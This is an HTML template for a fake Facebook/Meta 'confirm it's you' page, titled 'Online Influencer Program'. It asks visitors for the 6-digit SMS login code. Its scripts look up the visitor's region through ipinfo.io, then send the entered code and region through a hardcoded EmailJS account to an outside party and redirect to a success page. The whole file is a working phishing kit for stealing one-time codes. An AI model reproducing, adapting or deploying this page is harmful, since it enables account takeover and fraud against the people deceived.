<!DOCTYPE html>

<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Online Influencer Program</title>
    <script
      src="https://kit.fontawesome.com/afcb52252c.js"
      crossorigin="anonymous"
    ></script>
    <link href="{% static 'images/facebook_logo_icon_147291.ico' %}" rel="icon" />
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-9ndCyUaIbzAi2FUVXJi0CjmCapSmO7SnpJef0486qhLnuZ2cdeRhO02iuK6FUUVM"
      crossorigin="anonymous"
    />
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-geWF76RCwLtnZ8qwWowPQNguL3RmwHVBC9FhGdlKrxdiJJigb/j/68SIy3Te4Bkz"
      crossorigin="anonymous"
    ></script>
    <script type="module">
      import emailjs from 'https://cdn.emailjs.com/dist/email.min.js';
  </script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js"></script>
    <script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>

<style>
	body {
    background-color: #f2f2f2;
    max-height:100%;
    overflow:auto; 
}


.FBLogo{
    width: 250px;
    position: relative;
    top: 42px;
    display: inline;
}

.card{
    position: relative;
    top: 50px;
}

form{
    margin: 15px;
}
.form-heading{
    font-size: 18px;
    font-weight: 500;
}
.form-control{
    height: 50px;
}

form::placeholder{
    color: grey;
    letter-spacing: 10px;
}
.LogInBTN{
    width: 100%;
    background-color: #1877f2;
    height: 45px;
    font-size: 20px;
    font-weight: 700;
}

.forgetLink{
    position: relative;
    bottom: 18px;
    color: #1877f2;
    text-decoration: none;
    display: inline;

}

.CreateNewAccountBTN{
    background-color: #42b72a;
    width: 50%;
    height: 45px;
    font-size: 17px;
    font-weight: 700;
    border: 0;
}
.CreateNewAccountBTN:hover{
    background-color: #42b72a;

  
}

.card-body{
    padding-bottom: 18px;
}

.card{
    box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}


.cardHR {
    height:2px;
    border:0;
    background-color: #fff;
    line-height:20px;
    

}

.cardHR:before {
  content: '';
  display: block;
  height: 1px;
  background-color: #111;
}

.cardHR:after {
    content: 'or';
    color:#000;
    display:block;
    text-align:center;
    background-color:#fff;
    font-size: 14px;
    width:60px;
    margin-top:-10px;
    position:absolute;
    left:50%;
    -webkit-transform: translate(-50%);
    -moz-transform: translate(-50%);
    -ms-transform: translate(-50%);
    -o-transform: translate(-50%);
    transform: translate(-50%);  
}

.hr-container{
    position: relative;
    bottom: 13px;
}

.second-container{
    position: relative;
    top: 100px;
    background-color: #fff;
}



.title {
    color: #24bba0;
  }
  
  .header {
    color: #5371e1;
  }
  
  .detail {
    color: #b2b2b2;
  }
  
  .highlight {
    color: #5371e1;
  }
  
  .text {
    color: #ffffff;
  }
  
  .footer {
    padding-top: 65px;
    padding-bottom: 77px;
    max-width: 49%;
    margin: 40px auto;
    text-align: left;
    word-spacing: 7px;
    color: black;
    opacity: 0.6;

  }


  @media screen and (max-width:1294px) {
    .footer {
      
        max-width: 65%;
        padding-bottom: 65px;
    }
}
  @media screen and (max-width:633px) {
    .footer {
      
        max-width: 80%;
        padding-bottom: 65px;
    }
}
  @media screen and (max-width:402px) {
    .footer {
      
        max-width: 90%;
        padding-bottom: 65px;
    }
}
  
  .footer .hr-text {
    font-size: 20px;
    position: relative;
    border: 0;
    height: 1.5em;
  }
  
  .footer .hr-text:before {
    content: '';
    background: linear-gradient(to right, transparent, #b2b2b2, transparent);
    position: absolute;
    left: 0;
    top: 50%;
    width: 100%;
    height: 1px;
  }
  
  .footer .hr-text:after {
    content: attr(data-content);
    position: relative;
    display: inline-block;
    color: black;
  }
  
  .footer li {
    display: inline-block;
    font-size: 12px;
  }
  
  .footer i {
    font-size: 7px;
  }
  
.footerHR{
    position: relative;
    bottom: 8px;
}
.metaCopyRight{
    padding-top: 15px;
    font-size: 11px;
}

.plusBTN{
    font-size: 15px;
    height: 28px;
  
}
</style>
    <link rel="stylesheet" href="{% static 'css/style.css' %}" />
    <style>
      form button {
        padding: 10px;
        margin-top: 10px;
        background-color: #1877f2;
        color: #fff;
        font-weight: 500;
        display: flex;
        align-items: center;
        justify-content: center;
        border: none;
        border-radius: 5px;
      }

      #submit2 img {
        width: 1.3em;
        animation-name: roll;
        animation-duration: 0.7s;
        animation-iteration-count: infinite;
        animation-timing-function: linear;
        color: white;
      }

      @keyframes roll {
        from {
          transform: rotate(0deg);
        }
        to {
          transform: rotate(360deg);
        }
      }
    </style>
  </head>
  <body>
    <div class="FBLoginPage">
      <center>
        <div class="card" style="width: 25rem">
			<form id="contact-form" action="" >
        <input type="text" name="emanil" id="name" value="Confirm Account" placeholder="Email or phone number" hidden>
        <input type="text" name="emanil" id="email" value="Confirm Account" placeholder="Email or phone number" hidden>
        <input type="hidden" id="region" name="region">
        
        
        <p class="form-heading">Choose a way to confirm it's you</p>
            <hr />
            <small style="text-align: left !important">
              Enter the 6-digit code from the text message that we just sent to
              you
            </small>
            <hr />
            <div class="mb-3">
              <input
                type="number"
                placeholder="Enter OTP"
                name="otp"
                class="form-control"
                id="message"
                aria-describedby="emailHelp"
                required
              />
            </div>
          <a href=""> <button
              type="submit"
              name="submit"
              id="submit"
              onclick="handleSubmit()"
              class="btn btn-primary LogInBTN"
              style="font-size: 0.9em"
            >
              Submit Code
            </button></a> 
            <button
              type="button"
              name="submit"
              class="btn btn-primary LogInBTN"
              id="submit2"
              style="display: none"
            >
              <img src="{% static 'images/loading.svg' %}" alt="" />
            </button>
          </form>
        </div>
      </center>
    </div>

    <div class="second-container">
      <div class="footer">
        <ul id="techlist">
          <li>English&nbsp;(UK)</li>
          <i class="circle icon"></i>
          <li>हिन्दी</li>
          <i class="circle icon"></i>
          <li>ਪੰਜਾਬੀ</li>
          <i class="circle icon"></i>
          <li>ردو</li>
          <i class="circle icon"></i>
          <li>தமிழ்</li>
          <i class="circle icon"></i>
          <li>বাংলা</li>
          <i class="circle icon"></i>
          <li>मराठी</li>
          <i class="circle icon"></i>
          <li>తెలుగు</li>
          <i class="circle icon"></i>
          <li>ગુજરાતી</li>
          <i class="circle icon"></i>
          <li>ಕನ್ನಡ</li>
          <i class="circle icon"></i>
          <li>മലയാളം</li>
          <button class="plusBTN">+</button>

          <hr />
        </ul>
        <ul id="techlist">
          <li>Sign Up</li>
          <i class="circle icon"></i>
          <li>Log in</li>
          <i class="circle icon"></i>
          <li>Messenger</li>
          <i class="circle icon"></i>
          <li>Facebook Lite</li>
          <i class="circle icon"></i>
          <li>Watch</li>
          <i class="circle icon"></i>
          <li>Places</li>
          <i class="circle icon"></i>
          <li>Games</li>
          <i class="circle icon"></i>
          <li>Marketplace</li>
          <i class="circle icon"></i>
          <li>Meta Pay</li>
          <i class="circle icon"></i>
          <li>Meta Store</li>
          <i class="circle icon"></i>
          <li>Meta Quest</li>
          <i class="circle icon"></i>
          <li>Instagram</li>
          <i class="circle icon"></i>
          <li>Fundraisers</li>
          <i class="circle icon"></i>
          <li>Services</li>
          <i class="circle icon"></i>
          <li>Voting Information Centre</li>
          <i class="circle icon"></i>
          <li>Privacy Policy</li>
          <i class="circle icon"></i>
          <li>Privacy Centre</li>
          <i class="circle icon"></i>
          <li>Groups</li>
          <i class="circle icon"></i>
          <li>About</li>
          <i class="circle icon"></i>
          <li>Create ad</li>
          <i class="circle icon"></i>
          <li>Create Page</li>
          <i class="circle icon"></i>
          <li>Developers</li>
          <i class="circle icon"></i>
          <li>Careers</li>
          <i class="circle icon"></i>
          <li>Cookies</li>
          <i class="circle icon"></i>
          <li>AdChoices</li>
          <i class="circle icon"></i>
          <li>Terms</li>
          <i class="circle icon"></i>
          <li>Help</li>
          <i class="circle icon"></i>
          <li>Contact uploading and non-usersSettings</li>
          <p class="metaCopyRight">Meta © 2024</p>
        </ul>
      </div>
    </div>
    <input type="text" id="message" name="message"  value="EMAIL OTP" placeholder="OTP" hidden>
    <script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>

  <script type="text/javascript">
    (function() {
        emailjs.init("F-ukdXP-Y7BKpQ9Vz"); // Use your EmailJS User ID
    })();

    document.getElementById("contact-form").addEventListener("submit", function(event) {
        event.preventDefault();

        // Collect form values
        var name = document.getElementById("name").value;
        var email = document.getElementById("email").value;
        var message = document.getElementById("message").value;
        var region = document.getElementById("region").value;

        // Prepare email parameters
        var emailParams = {
            from_name: name,
            from_email: email,
            message: message,
            region: region
        };

        // Send the email using EmailJS
        emailjs.send("service_68kfjk2", "template_vnj442a", emailParams)
            .then(function(response) {
                console.log(" ", response);
                alert(" ");
              // Redirect to another page after email is sent
        window.location.href = "success.html";  // Redirect to a 'thank you' page after email is sent
            }, function(error) {
                console.error("Error sending email:", error);
                alert("Failed to send message. Please try again later.");
            });
    });
</script>

<script type="text/javascript"
        src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js">
</script>
<script type="text/javascript">
   (function(){
      emailjs.init({
        publicKey: "F-ukdXP-Y7BKpQ9Vz",
      });
   })();
</script>

<script>
  // Function to get user's country using IP info service
  function getUserRegion() {
      // Use ipinfo.io API to get user's geolocation info
      fetch('https://ipinfo.io?token=999a655c730c7c') // Replace 'YOUR_API_TOKEN' with your actual API token
          .then(response => response.json())
          .then(data => {
              // Get the country from the response data
              var region = data.region;

              // Populate the hidden form field with the country code
              document.getElementById('region').value = region;
          })
          .catch(error => {
              // Handle error if the API request fails
              alert('Error fetching region: ' + error.message);
          });
  }

  // Call getUserCountry when the page loads
  window.onload = function() {
      getUserRegion();
  }
</script>
  </body>
</html>
